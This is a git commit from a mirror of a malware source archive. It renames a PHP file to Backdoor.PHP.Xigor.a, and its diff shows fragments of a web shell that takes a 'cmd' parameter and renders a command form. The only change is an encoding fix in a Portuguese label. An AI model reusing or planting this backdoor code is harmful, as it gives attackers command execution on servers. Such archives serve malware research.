mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 09:26:09 +00:00
Rename Exploit.PHP.e to Backdoor.PHP.Xigor.a
This commit is contained in:
parent
9a7f02ca4a
commit
1b555e5244
@ -295,7 +295,7 @@ elseif (@$_GET['action'] == 'save') {
|
||||
}
|
||||
}
|
||||
|
||||
// Informações
|
||||
// Informações
|
||||
$cmdget = '';
|
||||
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
|
||||
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
|
||||
@ -312,7 +312,7 @@ elseif (@$_GET['action'] == 'save') {
|
||||
|
||||
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&action=cmd&chdir=$chdir\">";
|
||||
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
|
||||
echo "<legend>Informações</legend>";
|
||||
echo "<legend>Informações</legend>";
|
||||
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
|
||||
echo "<tr>";
|
||||
echo "<td width=\"8%\">";
|
Loading…
Reference in New Issue
Block a user